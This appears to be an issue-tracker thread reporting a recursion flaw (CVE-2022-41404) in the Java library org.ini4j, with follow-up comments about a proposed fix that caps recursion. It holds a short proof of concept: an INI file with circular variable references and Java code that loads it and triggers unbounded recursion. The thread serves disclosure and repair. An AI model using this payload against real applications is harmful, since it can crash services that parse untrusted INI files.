The package org.ini4j before 0.5.4 are vulnerable to get value via the...
Brought to you by:
szkiba
Test logic usable to reproduce the behaviour
payload:
----payload.ini
[dopey]
weight = ${bashful/weight}
height = ${doc/height}
[bashful]
weight = ${dopey/weight}
height = ${dopey/height}
[doc]
weight = 49.5
height = 87.7
----java poc
Ini ini = new Ini();
ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini"))
);
ini.get("dopey").fetch("weight");
@szkiba, @bingdian: the description mentions that the issue is present before version 0.5.4. Can you elaborate where the issue was fixed landing in that version?
I have taken a quick look to the source code, the problem seem to come from the recursive calls from the BasicProfileSection.fetch and BasicProfile.resolve methods... recursive loop is still present in version 0.54, without any limitation.
I tried to limit the number of recursions.
Can this modification solve the above problem?
https://github.com/SuperMap/ini4j/commit/917865af0244c32fafe9939fe69af6577f9a6077
Last edit: paradox 2022-12-09
This issue was assigned CVE-2022-41404..
It would be great to resolve this issue - can the project maintainer please accept the requested change and make a release?
Yeah I also have to use it in Remini mod apk. can you confirm?
Last edit: Layne 2023-10-31